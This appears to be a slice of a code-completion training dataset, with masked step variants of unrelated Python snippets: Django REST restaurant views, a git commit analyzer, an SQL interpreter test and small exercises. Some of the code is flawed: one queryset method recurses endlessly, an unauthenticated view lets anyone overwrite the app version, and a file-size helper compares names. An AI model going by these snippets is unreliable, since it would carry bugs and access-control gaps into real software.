@action(methods=['post'], detail=False, url_path='register', permission_classes=[permissions.AllowAny()])\n def register(self, request, *args, **kwargs):\n response = super().create(request, *args, **kwargs)\n if response:\n response.data = dict(status=True, code=4)\n return response\n\n def create(self, request, *args, **kwargs):\n return self.register(request, *args, **kwargs)\n\n\nclass OtpApi(APIView):\n permission_classes = [permissions.AllowAny]\n\n def get(self, request):\n serializer = SmsConfirmationSerializer(data=request.GET)\n result = serializer.resend()\n if result:\n response = dict(status=True, code=5)\n else:\n response = dict(status=False, code=21)\n return Response(response)\n\n def put(self, request):\n serializer = SmsConfirmationSerializer(data=request.data)\n result = serializer.activate()\n if result:\n response = dict(status=True, code=5)\n else:\n response = dict(status=False, code=20)\n return Response(response)\n\n\nclass CuisineViewSet(ModelViewSet):\n serializer_class = CuisineSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Cuisine.objects.all()\n\n\nclass MealTypeViewSet(ModelViewSet):\n permission_classes = [my_perms.IsAdminOrReadOnly]\n serializer_class = MealTypeSerializer\n queryset = MealType.objects.all()\n\n def get_serializer(self, *args, **kwargs):\n if self.action == \"get_types_with_menus\":\n serializer_class = MealTypesWithMenuSerializer\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)\n\n @action(['get'], detail=False, url_path=\"type-with-menus\", )\n def get_types_with_menus(self, request, *args, **kwargs):\n types = self.get_queryset().filter(menus__offered_by=request.query_params.get('restaurant', 0))\n types = self.get_serializer(types, many=True).data\n return Response(types)\n\n\nclass RestaurantTypeViewSet(ModelViewSet):\n serializer_class = RestaurantTypeSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = RestaurantType.objects.all()\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) -> queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) -> queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path=\"get-home\")\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = self.get_queryset().order_by('?')[:5]\n recommended = self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {\n 'recommended': recommended,\n 'special': special,\n 'all': all_restaurants\n }\n return Response(response)\n\n @action(['get'], detail=False, url_path=\"special-offers\")\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path=\"recommended-offers\")\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants().order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, url_path=\"restaurant-menus\")\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(restaurant_id=self.kwargs.get('pk'))\n return Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path=\"get-home\")\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {\n 'recommended': recommended,\n 'special_offers': special_offers\n }\n return Response(data=response)\n\n @action(['get'], detail=False, url_path=\"special-offers\")\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at')\n serializer = self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path=\"recommended-offers\")\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == \"create\":\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, self).get_queryset().filter(client=self.request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\ndef version(request):\n print('inside this')\n if request.GET.get('code', None):\n code = request.GET.get('code')\n AppVersion.objects.all().update(code=code)\n return JsonResponse({'updated': True})\n else:\n code = AppVersion.objects.all().first().code\n return JsonResponse({'code': code})\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path=\"set-default\", url_name='set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.user.client).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path=\"set-main\", url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(default=False)\n return Response({\"status\": True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to=self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path=\"set-main\", url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({\"status\": True})\n\n @action(['PUT'], detail=True, url_path=\"set-default\", url_name='set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
"step-ids": [
34,
40,
41,
42,
56
]
}
|
[
34,
40,
41,
42,
56
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
planet_list.append('Jupiter')
planet_list.append('Saturn')
planet_list.extend(['Uranus', 'Neptune'])
planet_list.insert(1, 'Earth')
planet_list.insert(1, 'Venus')
planet_list.append('Pluto')
del planet_list[-1]
print(planet_list)
<|reserved_special_token_1|>
planet_list = ['Mercury', 'Mars']
planet_list.append('Jupiter')
planet_list.append('Saturn')
planet_list.extend(['Uranus', 'Neptune'])
planet_list.insert(1, 'Earth')
planet_list.insert(1, 'Venus')
planet_list.append('Pluto')
del planet_list[-1]
print(planet_list)
<|reserved_special_token_1|>
planet_list = ["Mercury", "Mars"]
planet_list.append("Jupiter")
planet_list.append("Saturn")
planet_list.extend(["Uranus", "Neptune"])
planet_list.insert(1, "Earth")
planet_list.insert(1, "Venus")
planet_list.append("Pluto")
del planet_list[-1]
print(planet_list)
|
flexible
|
{
"blob_id": "1280ab66b817011e22e560a78104bbc4340989e7",
"index": 8495,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplanet_list.append('Jupiter')\nplanet_list.append('Saturn')\nplanet_list.extend(['Uranus', 'Neptune'])\nplanet_list.insert(1, 'Earth')\nplanet_list.insert(1, 'Venus')\nplanet_list.append('Pluto')\ndel planet_list[-1]\nprint(planet_list)\n",
"step-3": "planet_list = ['Mercury', 'Mars']\nplanet_list.append('Jupiter')\nplanet_list.append('Saturn')\nplanet_list.extend(['Uranus', 'Neptune'])\nplanet_list.insert(1, 'Earth')\nplanet_list.insert(1, 'Venus')\nplanet_list.append('Pluto')\ndel planet_list[-1]\nprint(planet_list)\n",
"step-4": "planet_list = [\"Mercury\", \"Mars\"]\n\nplanet_list.append(\"Jupiter\")\nplanet_list.append(\"Saturn\")\nplanet_list.extend([\"Uranus\", \"Neptune\"])\nplanet_list.insert(1, \"Earth\")\nplanet_list.insert(1, \"Venus\")\nplanet_list.append(\"Pluto\")\ndel planet_list[-1]\n\nprint(planet_list)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from .dataset_readers import *
from .models import *
|
flexible
|
{
"blob_id": "bc8bf06f1adedeb7b364308591bff09ac42d6c29",
"index": 3702,
"step-1": "<mask token>\n",
"step-2": "from .dataset_readers import *\nfrom .models import *\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import os
import glob
ONE_KB = 1024
def get_files(dirname, size_in_kb):
"""Return files in dirname that are >= size_in_kb"""
return (
filename
for _, _, files in os.walk(dirname)
for filename in files
if int(filename) >= size_in_kb * ONE_KB
)
# Pybites solution
def get_files1(dirname, size_in_kb):
"""Return files in dirname that are >= size_in_kb"""
for file in glob.glob(os.path.join(dirname, "*")):
if os.stat(file).st_size >= size_in_kb * ONE_KB:
yield file
|
normal
|
{
"blob_id": "0dec0f04cfe891eea74ef45484fa7433e3429dcd",
"index": 7570,
"step-1": "<mask token>\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-2": "<mask token>\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-3": "<mask token>\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-4": "import os\nimport glob\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-5": "import os\nimport glob\n\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (\n filename\n for _, _, files in os.walk(dirname)\n for filename in files\n if int(filename) >= size_in_kb * ONE_KB\n )\n\n\n# Pybites solution\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, \"*\")):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class CommitAnalyzer:
<|reserved_special_token_0|>
def __init__(self, repo_path):
self.repo_path = repo_path
self.repo = Repo(self.repo_path)
assert not self.repo.bare
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CommitAnalyzer:
"""
Takes path of the repo
"""
def __init__(self, repo_path):
self.repo_path = repo_path
self.repo = Repo(self.repo_path)
assert not self.repo.bare
def get_conflict_commits(self):
conflict_commits = []
current_date = datetime.now()
for commit in self.repo.iter_commits('master'):
parents = commit.parents
if len(parents) > 1 and 'conflict' in commit.message.lower(
) and '.java' in commit.message.lower():
conflict_commits.append(commit)
return conflict_commits
<|reserved_special_token_0|>
for commit in commit_analyzer.get_conflict_commits():
print(commit, time.asctime(time.gmtime(commit.committed_date)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CommitAnalyzer:
"""
Takes path of the repo
"""
def __init__(self, repo_path):
self.repo_path = repo_path
self.repo = Repo(self.repo_path)
assert not self.repo.bare
def get_conflict_commits(self):
conflict_commits = []
current_date = datetime.now()
for commit in self.repo.iter_commits('master'):
parents = commit.parents
if len(parents) > 1 and 'conflict' in commit.message.lower(
) and '.java' in commit.message.lower():
conflict_commits.append(commit)
return conflict_commits
commit_analyzer = CommitAnalyzer(os.getcwd())
for commit in commit_analyzer.get_conflict_commits():
print(commit, time.asctime(time.gmtime(commit.committed_date)))
<|reserved_special_token_1|>
import os
import time
from datetime import datetime, timedelta
from git import Repo
class CommitAnalyzer:
"""
Takes path of the repo
"""
def __init__(self, repo_path):
self.repo_path = repo_path
self.repo = Repo(self.repo_path)
assert not self.repo.bare
def get_conflict_commits(self):
conflict_commits = []
current_date = datetime.now()
for commit in self.repo.iter_commits('master'):
parents = commit.parents
if len(parents) > 1 and 'conflict' in commit.message.lower(
) and '.java' in commit.message.lower():
conflict_commits.append(commit)
return conflict_commits
commit_analyzer = CommitAnalyzer(os.getcwd())
for commit in commit_analyzer.get_conflict_commits():
print(commit, time.asctime(time.gmtime(commit.committed_date)))
<|reserved_special_token_1|>
import os
import time
from datetime import datetime, timedelta
from git import Repo
class CommitAnalyzer():
"""
Takes path of the repo
"""
def __init__(self, repo_path):
self.repo_path = repo_path
self.repo = Repo(self.repo_path)
assert not self.repo.bare
def get_conflict_commits(self):
conflict_commits = []
current_date = datetime.now()
for commit in self.repo.iter_commits('master'):
parents = commit.parents
if len(parents) > 1 and "conflict" in commit.message.lower() and ".java" in commit.message.lower():
#if datetime.fromtimestamp(commit.committed_date) >= current_date - timedelta(5):
conflict_commits.append(commit)
return conflict_commits
#run script in cloned repo
commit_analyzer = CommitAnalyzer(os.getcwd())
for commit in commit_analyzer.get_conflict_commits():
print (commit, time.asctime(time.gmtime(commit.committed_date)))
|
flexible
|
{
"blob_id": "8479c70fed36dc6f1e6094c832fb22d8c2e53e3a",
"index": 920,
"step-1": "<mask token>\n\n\nclass CommitAnalyzer:\n <mask token>\n\n def __init__(self, repo_path):\n self.repo_path = repo_path\n self.repo = Repo(self.repo_path)\n assert not self.repo.bare\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CommitAnalyzer:\n \"\"\"\n\tTakes path of the repo\n\t\"\"\"\n\n def __init__(self, repo_path):\n self.repo_path = repo_path\n self.repo = Repo(self.repo_path)\n assert not self.repo.bare\n\n def get_conflict_commits(self):\n conflict_commits = []\n current_date = datetime.now()\n for commit in self.repo.iter_commits('master'):\n parents = commit.parents\n if len(parents) > 1 and 'conflict' in commit.message.lower(\n ) and '.java' in commit.message.lower():\n conflict_commits.append(commit)\n return conflict_commits\n\n\n<mask token>\nfor commit in commit_analyzer.get_conflict_commits():\n print(commit, time.asctime(time.gmtime(commit.committed_date)))\n",
"step-3": "<mask token>\n\n\nclass CommitAnalyzer:\n \"\"\"\n\tTakes path of the repo\n\t\"\"\"\n\n def __init__(self, repo_path):\n self.repo_path = repo_path\n self.repo = Repo(self.repo_path)\n assert not self.repo.bare\n\n def get_conflict_commits(self):\n conflict_commits = []\n current_date = datetime.now()\n for commit in self.repo.iter_commits('master'):\n parents = commit.parents\n if len(parents) > 1 and 'conflict' in commit.message.lower(\n ) and '.java' in commit.message.lower():\n conflict_commits.append(commit)\n return conflict_commits\n\n\ncommit_analyzer = CommitAnalyzer(os.getcwd())\nfor commit in commit_analyzer.get_conflict_commits():\n print(commit, time.asctime(time.gmtime(commit.committed_date)))\n",
"step-4": "import os\nimport time\nfrom datetime import datetime, timedelta\nfrom git import Repo\n\n\nclass CommitAnalyzer:\n \"\"\"\n\tTakes path of the repo\n\t\"\"\"\n\n def __init__(self, repo_path):\n self.repo_path = repo_path\n self.repo = Repo(self.repo_path)\n assert not self.repo.bare\n\n def get_conflict_commits(self):\n conflict_commits = []\n current_date = datetime.now()\n for commit in self.repo.iter_commits('master'):\n parents = commit.parents\n if len(parents) > 1 and 'conflict' in commit.message.lower(\n ) and '.java' in commit.message.lower():\n conflict_commits.append(commit)\n return conflict_commits\n\n\ncommit_analyzer = CommitAnalyzer(os.getcwd())\nfor commit in commit_analyzer.get_conflict_commits():\n print(commit, time.asctime(time.gmtime(commit.committed_date)))\n",
"step-5": "import os\nimport time\nfrom datetime import datetime, timedelta\nfrom git import Repo\n\nclass CommitAnalyzer():\n\n\t\"\"\"\n\tTakes path of the repo\n\t\"\"\"\n\tdef __init__(self, repo_path):\n\t\tself.repo_path = repo_path\n\t\tself.repo = Repo(self.repo_path)\n\t\tassert not self.repo.bare\n\n\tdef get_conflict_commits(self):\n\t\tconflict_commits = []\n\t\tcurrent_date = datetime.now()\n\t\tfor commit in self.repo.iter_commits('master'):\n\t\t\tparents = commit.parents\n\t\t\tif len(parents) > 1 and \"conflict\" in commit.message.lower() and \".java\" in commit.message.lower():\n\t\t\t\t#if datetime.fromtimestamp(commit.committed_date) >= current_date - timedelta(5):\n\t\t\t\tconflict_commits.append(commit)\n\n\t\treturn conflict_commits\n\n#run script in cloned repo\ncommit_analyzer = CommitAnalyzer(os.getcwd())\nfor commit in commit_analyzer.get_conflict_commits():\n\tprint (commit, time.asctime(time.gmtime(commit.committed_date)))",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
#Exercise 2 - Write a Python class which has two methods get_String and print_String. get_String accept a string
#from the user and print_String print the string in upper case
#string will be an input to a get_string method and whatever you put in will print when you make the print screen method
class IOString():
def __init__(self):
self.str1 = ""
def get_String(self):
self.str1 = input()
def print_String(self):
print(self.str1.upper())
str1 = IOString()
str1.get_String()
str1.print_String()
|
normal
|
{
"blob_id": "cf2973b94f1113013fe9baa946202ec75488f7d2",
"index": 9697,
"step-1": "class IOString:\n <mask token>\n\n def get_String(self):\n self.str1 = input()\n <mask token>\n\n\n<mask token>\n",
"step-2": "class IOString:\n <mask token>\n\n def get_String(self):\n self.str1 = input()\n\n def print_String(self):\n print(self.str1.upper())\n\n\n<mask token>\n",
"step-3": "class IOString:\n\n def __init__(self):\n self.str1 = ''\n\n def get_String(self):\n self.str1 = input()\n\n def print_String(self):\n print(self.str1.upper())\n\n\n<mask token>\n",
"step-4": "class IOString:\n\n def __init__(self):\n self.str1 = ''\n\n def get_String(self):\n self.str1 = input()\n\n def print_String(self):\n print(self.str1.upper())\n\n\n<mask token>\nstr1.get_String()\nstr1.print_String()\n",
"step-5": "#Exercise 2 - Write a Python class which has two methods get_String and print_String. get_String accept a string\n#from the user and print_String print the string in upper case\n#string will be an input to a get_string method and whatever you put in will print when you make the print screen method\n\nclass IOString():\n def __init__(self):\n self.str1 = \"\"\n \n def get_String(self):\n self.str1 = input()\n \n def print_String(self):\n print(self.str1.upper())\n \nstr1 = IOString()\nstr1.get_String()\nstr1.print_String()",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
<|reserved_special_token_0|>
class InterpreterTest:
<|reserved_special_token_0|>
def tearDown(self):
self.interpreter.unload_all()
<|reserved_special_token_0|>
def test_select_2(self):
sql = """select
e.id, last_name, department_id, departments.id, name
from employees e, departments;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_all(self):
code = 'select * from employees;'
self.interpreter.interpret(code)
self.cli.print_new_line()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InterpreterTest:
<|reserved_special_token_0|>
def tearDown(self):
self.interpreter.unload_all()
<|reserved_special_token_0|>
def test_select_2(self):
sql = """select
e.id, last_name, department_id, departments.id, name
from employees e, departments;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_all(self):
code = 'select * from employees;'
self.interpreter.interpret(code)
self.cli.print_new_line()
def test_select_distinct(self):
sql = """select distinct
departments.id as dep_id, employees.salary as sal
from employees, departments
order by dep_id, sal desc;"""
self.cli.execute(sql)
self.cli.print_new_line()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InterpreterTest:
def setUp(self):
self.interpreter = SqlInterpreter()
self.cli = Cli(self.interpreter)
filename = os.path.join(os.path.dirname(__file__),
'resources/employees.csv')
self.interpreter.load(CsvTable('employees', filename))
filename = os.path.join(os.path.dirname(__file__),
'resources/departments.csv')
self.interpreter.load(CsvTable('departments', filename))
def tearDown(self):
self.interpreter.unload_all()
def test_select_1(self):
sql = """select
id, first_name || ' ' || last_name as full_name, salary - 1000
from employees;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_2(self):
sql = """select
e.id, last_name, department_id, departments.id, name
from employees e, departments;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_all(self):
code = 'select * from employees;'
self.interpreter.interpret(code)
self.cli.print_new_line()
def test_select_distinct(self):
sql = """select distinct
departments.id as dep_id, employees.salary as sal
from employees, departments
order by dep_id, sal desc;"""
self.cli.execute(sql)
self.cli.print_new_line()
if __name__ == '__main__':
test = InterpreterTest()
test.setUp()
test.test_select_1()
test.test_select_2()
test.test_select_distinct()
test.tearDown()
<|reserved_special_token_1|>
import os
from sql_interpreter.tables.csv_table import CsvTable
from sql_interpreter.interpreter import SqlInterpreter
from sql_interpreter.cli import Cli
class InterpreterTest:
def setUp(self):
self.interpreter = SqlInterpreter()
self.cli = Cli(self.interpreter)
filename = os.path.join(os.path.dirname(__file__),
'resources/employees.csv')
self.interpreter.load(CsvTable('employees', filename))
filename = os.path.join(os.path.dirname(__file__),
'resources/departments.csv')
self.interpreter.load(CsvTable('departments', filename))
def tearDown(self):
self.interpreter.unload_all()
def test_select_1(self):
sql = """select
id, first_name || ' ' || last_name as full_name, salary - 1000
from employees;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_2(self):
sql = """select
e.id, last_name, department_id, departments.id, name
from employees e, departments;"""
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_all(self):
code = 'select * from employees;'
self.interpreter.interpret(code)
self.cli.print_new_line()
def test_select_distinct(self):
sql = """select distinct
departments.id as dep_id, employees.salary as sal
from employees, departments
order by dep_id, sal desc;"""
self.cli.execute(sql)
self.cli.print_new_line()
if __name__ == '__main__':
test = InterpreterTest()
test.setUp()
test.test_select_1()
test.test_select_2()
test.test_select_distinct()
test.tearDown()
<|reserved_special_token_1|>
import os
from sql_interpreter.tables.csv_table import CsvTable
from sql_interpreter.interpreter import SqlInterpreter
from sql_interpreter.cli import Cli
class InterpreterTest():
def setUp(self):
self.interpreter = SqlInterpreter()
self.cli = Cli(self.interpreter)
filename = os.path.join(
os.path.dirname(__file__), 'resources/employees.csv')
self.interpreter.load(CsvTable('employees', filename))
filename = os.path.join(
os.path.dirname(__file__), 'resources/departments.csv')
self.interpreter.load(CsvTable('departments', filename))
def tearDown(self):
self.interpreter.unload_all()
def test_select_1(self):
sql = '''select
id, first_name || ' ' || last_name as full_name, salary - 1000
from employees;'''
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_2(self):
sql = '''select
e.id, last_name, department_id, departments.id, name
from employees e, departments;'''
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_all(self):
code = '''select * from employees;'''
self.interpreter.interpret(code)
self.cli.print_new_line()
def test_select_distinct(self):
sql = '''select distinct
departments.id as dep_id, employees.salary as sal
from employees, departments
order by dep_id, sal desc;'''
self.cli.execute(sql)
self.cli.print_new_line()
if __name__ == '__main__':
test = InterpreterTest()
test.setUp()
test.test_select_1()
test.test_select_2()
test.test_select_distinct()
test.tearDown()
|
flexible
|
{
"blob_id": "b3ee76bc0d93135d0908044a2424dd927a390007",
"index": 6357,
"step-1": "<mask token>\n\n\nclass InterpreterTest:\n <mask token>\n\n def tearDown(self):\n self.interpreter.unload_all()\n <mask token>\n\n def test_select_2(self):\n sql = \"\"\"select\n e.id, last_name, department_id, departments.id, name\n from employees e, departments;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_all(self):\n code = 'select * from employees;'\n self.interpreter.interpret(code)\n self.cli.print_new_line()\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass InterpreterTest:\n <mask token>\n\n def tearDown(self):\n self.interpreter.unload_all()\n <mask token>\n\n def test_select_2(self):\n sql = \"\"\"select\n e.id, last_name, department_id, departments.id, name\n from employees e, departments;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_all(self):\n code = 'select * from employees;'\n self.interpreter.interpret(code)\n self.cli.print_new_line()\n\n def test_select_distinct(self):\n sql = \"\"\"select distinct\n departments.id as dep_id, employees.salary as sal\n from employees, departments\n order by dep_id, sal desc;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass InterpreterTest:\n\n def setUp(self):\n self.interpreter = SqlInterpreter()\n self.cli = Cli(self.interpreter)\n filename = os.path.join(os.path.dirname(__file__),\n 'resources/employees.csv')\n self.interpreter.load(CsvTable('employees', filename))\n filename = os.path.join(os.path.dirname(__file__),\n 'resources/departments.csv')\n self.interpreter.load(CsvTable('departments', filename))\n\n def tearDown(self):\n self.interpreter.unload_all()\n\n def test_select_1(self):\n sql = \"\"\"select\n id, first_name || ' ' || last_name as full_name, salary - 1000\n from employees;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_2(self):\n sql = \"\"\"select\n e.id, last_name, department_id, departments.id, name\n from employees e, departments;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_all(self):\n code = 'select * from employees;'\n self.interpreter.interpret(code)\n self.cli.print_new_line()\n\n def test_select_distinct(self):\n sql = \"\"\"select distinct\n departments.id as dep_id, employees.salary as sal\n from employees, departments\n order by dep_id, sal desc;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n\nif __name__ == '__main__':\n test = InterpreterTest()\n test.setUp()\n test.test_select_1()\n test.test_select_2()\n test.test_select_distinct()\n test.tearDown()\n",
"step-4": "import os\nfrom sql_interpreter.tables.csv_table import CsvTable\nfrom sql_interpreter.interpreter import SqlInterpreter\nfrom sql_interpreter.cli import Cli\n\n\nclass InterpreterTest:\n\n def setUp(self):\n self.interpreter = SqlInterpreter()\n self.cli = Cli(self.interpreter)\n filename = os.path.join(os.path.dirname(__file__),\n 'resources/employees.csv')\n self.interpreter.load(CsvTable('employees', filename))\n filename = os.path.join(os.path.dirname(__file__),\n 'resources/departments.csv')\n self.interpreter.load(CsvTable('departments', filename))\n\n def tearDown(self):\n self.interpreter.unload_all()\n\n def test_select_1(self):\n sql = \"\"\"select\n id, first_name || ' ' || last_name as full_name, salary - 1000\n from employees;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_2(self):\n sql = \"\"\"select\n e.id, last_name, department_id, departments.id, name\n from employees e, departments;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n def test_select_all(self):\n code = 'select * from employees;'\n self.interpreter.interpret(code)\n self.cli.print_new_line()\n\n def test_select_distinct(self):\n sql = \"\"\"select distinct\n departments.id as dep_id, employees.salary as sal\n from employees, departments\n order by dep_id, sal desc;\"\"\"\n self.cli.execute(sql)\n self.cli.print_new_line()\n\n\nif __name__ == '__main__':\n test = InterpreterTest()\n test.setUp()\n test.test_select_1()\n test.test_select_2()\n test.test_select_distinct()\n test.tearDown()\n",
